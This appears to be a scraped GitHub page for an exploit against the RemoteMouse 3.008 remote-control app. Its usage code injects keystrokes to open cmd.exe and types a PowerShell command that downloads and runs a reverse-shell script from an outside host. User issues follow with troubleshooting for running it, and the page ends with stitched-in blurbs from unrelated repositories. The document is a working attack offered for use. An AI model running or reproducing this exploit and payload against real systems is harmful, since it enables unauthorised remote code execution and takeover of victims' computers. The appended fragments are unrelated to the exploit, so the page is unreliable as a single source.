This exploit allows to connect to the remote RemoteMouse 3.008 service to virtually press arbitrary keys and execute code on the machine.

Related tags

Security related resourcesremote-controlexploitpentestremotemouse
Overview

RemoteMouse-3.008-Exploit

The RemoteMouse application is a program for remotely controlling a computer from a phone or tablet. This exploit allows to connect to the remote RemoteMouse service to virtually press arbitrary keys and execute code on the machine.

Video Proof of Concept

poc.mp4

Usage

remotemouse = RemoteMouse(host=options.target_ip, verbose=options.verbose)

# Press Win + R
remotemouse._send_command(Keymap.KEY_WIN)

# Type cmd.exe
remotemouse.keyboard.press(Keymap.KEY_BACKSPACE)
remotemouse.keyboard.type("cmd.exe")
remotemouse.keyboard.press(Keymap.KEY_RETURN)

# Wait for cmd.exe to start
time.sleep(0.5)

# Payload
cmd = "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://192.168.2.51:8000/revshell.ps1')\""

# Send payload char by char
remotemouse.keyboard.type(cmd)

# Press enter to execute payload
remotemouse.keyboard.press(Keymap.KEY_WIN)

Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.

References

Comments
  • unsupported operand type(s) Python 3.10.4

    unsupported operand type(s) Python 3.10.4

    Hey,

    I'm getting issues when running the exploit on Python 3.10.4. $ python3 Remote.py -v -t $IP

    [cmd] Keymap.KEY_WIN
ERROR: a bytes-like object is required, not 'Keymap'
[cmd] key  3BASd
Traceback (most recent call last):
  File "/tmp/Remote.py", line 275, in <module>
    remotemouse.keyboard.type("cmd.exe")
  File "/tmp/Remote.py", line 171, in type
    self.press(character)
  File "/tmp/Remote.py", line 178, in press
    self.parent_remotemouse._send_command(self.charset[key] + "d")
TypeError: unsupported operand type(s) for +: 'Keymap' and 'str'
    opened by Darktortue 1
  • the script is not running as expected

    the script is not running as expected

    ISSUE

    Using the provided RemoteMouse-3.008-Exploit.py AS-IS, will not work.

    EXPECTED BEHAVIOR

    • I'm expecting the start menu to open and the cmd.exe to be written...

    ACTUAL BEHAVIOR

    • Nothing opens or written

    TROUBLESHOOTING

    • I've changed remotemouse._send_command(Keymap.KEY_WIN.value) to remotemouse.keyboard.press(Keymap.KEY_WIN)
      • now the start menu opens
    • I wanted to just test the typing functionality with remotemouse.keyboard.type("cmd.exe")
      • I opened a notepad with the cursor active on it, nothing happened.

    ENVIRONMENT

    • source: Kali Linux
      • Python 3.9.12
    • target: Windows 10 (version 1709)
    opened by bigoper 0
  • not sure why it's trying to enum a keymap

    not sure why it's trying to enum a keymap 

    class Keymap(Enum):

    File "./yeaboi.py", line 118, in Keymap KEY_MINUS = "7[ras]24" File "/usr/lib/python3.6/enum.py", line 92, in setitem raise TypeError('Attempted to reuse key: %r' % key) TypeError: Attempted to reuse key: 'KEY_MINUS'

    opened by NAP3XD 0
  • Having issue when running the script

    Having issue when running the script

    Hi P0dalirius,

    This is an awsome exploit but i'm having some issues running it from my VM, are you able to advise as to why? I'm running ./remote -v -t $IP Traceback (most recent call last): File "/home**<redcated>**/p0dalirius-RemoteMouse-3.008-Exploit-1cb4f0d/RemoteMouse-3.008-Exploit.py", line 25, in <module> class Keymap(Enum): File "/home/**<redcated>**/p0dalirius-RemoteMouse-3.008-Exploit-1cb4f0d/RemoteMouse-3.008-Exploit.py", line 115, in Keymap KEY_MINUS = "7[ras]24" File "/usr/lib/python3.9/enum.py", line 133, in __setitem__ raise TypeError('Attempted to reuse key: %r' % key) TypeError: Attempted to reuse key: 'KEY_MINUS'

    opened by reshfi 0
  • Running exploit in slower networks leads to

    Running exploit in slower networks leads to "not-in-order" output

    Thanks for your well written exploit code, but I have one issue with the execution of it in worse network conditions than a local network. A good addition would be to add a configurable sleep between the keystrokes to make this issue less common.

    Otherwise it would look like this: image

    opened by 1989gironimo 0
Releases(1.0)
Owner
Podalirius
Hacker of everything
Podalirius
GitHub Repository https://podalirius.net/en/articles/writing-an-exploit-for-remotemouse-3.008/
Simple script to have LDAP authentication in Home Assistant Docker, using NGINX's ldap-auth container

Home Assistant LDAP Auth Simple script to have LDAP authentication in Home Assistant Docker, using NGINX's ldap-auth container. Usage Deploy NGINX's l

Erik 1 Sep 21, 2022
2021hvv漏洞汇总

清单 披露时间 涉及商家/产品 漏洞描述 2021/04/08 启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08 禅道项目管理软件11.6 禅道 11.6 sq

555 Jan 02, 2023
Chapter 1 of the AWS Cookbook

Chapter 1 - Security Set and export your default region: export AWS_REGION=us-east-1 Set your AWS ACCOUNT ID:: AWS_ACCOUNT_ID=$(aws sts get-caller-ide

AWS Cookbook 30 Nov 27, 2022
PoC for CVE-2020-6207 (Missing Authentication Check in SAP Solution Manager)

PoC for CVE-2020-6207 (Missing Authentication Check in SAP Solution Manager) This script allows to check and exploit missing authentication checks in

chipik 82 Nov 09, 2022
Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)

log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk

Fox-IT 431 Dec 22, 2022
A python script to decrypt media files encrypted using the Android application 'Decrypting 'LOCKED Secret Calculator Vault''. Will identify PIN / pattern.

A python script to decrypt media files encrypted using the Android application 'Decrypting 'LOCKED Secret Calculator Vault''. Will identify PIN / pattern.

3 Sep 26, 2022
Dependency injection in python with autoconfiguration

The base is a DynamicContainer to autoconfigure services using the decorators @services for regular services and @command_handler for using command pattern.

Sergio Gómez 2 Jan 17, 2022
About Hive Burp Suite Extension

Hive Burp Suite Extension Description Hive extension for Burp Suite. This extension allows you to send data from Burp to Hive in one click. Create iss

7 Dec 07, 2022
On-demand scanning for container registries

Lacework registry scanner Install & configure Lacework CLI Integrate a Container Registry Go to Lacework Resources Containers Container Image In

Will Robinson 1 Dec 14, 2021
Malware Configuration And Payload Extraction

CAPEv2 (Python3) has now been released CAPEv2 With the imminent end-of-life for Python 2 (January 1 2020), CAPEv1 will be phased out. Please upgrade t

Context Information Security 701 Dec 27, 2022
Abusing Microsoft 365 OAuth Authorization Flow for Phishing Attack

O365DevicePhish Microsoft365_devicePhish Abusing Microsoft 365 OAuth Authorization Flow for Phishing Attack This is a simple proof-of-concept script t

Trewis [work] Scotch 4 Sep 23, 2022
Learning to compose soft prompts for compositional zero-shot learning.

Compositional Soft Prompting (CSP) Compositional soft prompting (CSP), a parameter-efficient learning technique to improve the zero-shot compositional

Bats Research 32 Jan 02, 2023
Hadoop Yan ResourceManager unauthorized RCE

Vuln Impact There was an unauthorized access vulnerability in Hadoop yarn ResourceManager. This vulnerability existed in Hadoop yarn, the core compone

Al1ex 25 Nov 24, 2022
Experimental musig2 python code, not for production use!

musig2-py Experimental musig2 python code, not for production use! This is just for testing things out. All public keys are encoded as 32 bytes, assum

Samuel Dobson 14 Jul 08, 2022
Remote Desktop Protocol in Twisted Python

RDPY Remote Desktop Protocol in twisted python. RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client a

Sylvain Peyrefitte 1.6k Dec 30, 2022
Log4j minecraft with python

log4jminecraft This code DOES NOT promote or encourage any illegal activities! The content in this document is provided solely for educational purpose

David Bombal 154 Dec 24, 2022
Use scrapli to retrieve security zone information from a Juniper SRX firewall

Get Security Zones with Scrapli Overview This example will show how to retrieve security zone information on Juniper's SRX firewalls. In addition to t

Calvin Remsburg 2 Jun 19, 2022
A tool to crack a wifi password with a help of wordlist

A tool to crack a wifi password with a help of wordlist. This may take long to crack a wifi depending upon number of passwords your wordlist contains. Also it is slower as compared to social media ac

Saad 144 Dec 29, 2022
This tool help you to check if your Windows machine has hidden miner.

Hidden Miner Detector This tool help you to check if your Windows machine has hidden miner. Miners track when you open antivirus software or task mana

Николай Борщёв 2 Oct 05, 2022
Password List Maker

Red-Key Red-Key Password List Maker Version 1.1.2 Created By FireKing255 -=Features=- Create Random Password List Create Password List Create Password

FireKing255 7 Dec 26, 2021